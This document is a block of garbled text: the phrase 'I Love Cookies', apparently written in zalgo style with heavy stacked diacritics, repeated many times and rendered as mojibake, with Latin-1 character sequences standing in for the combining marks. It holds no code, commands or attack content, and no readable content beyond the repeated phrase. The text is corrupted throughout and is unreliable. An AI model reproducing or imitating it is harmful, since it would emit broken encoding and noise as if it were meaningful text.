ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³vIÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ 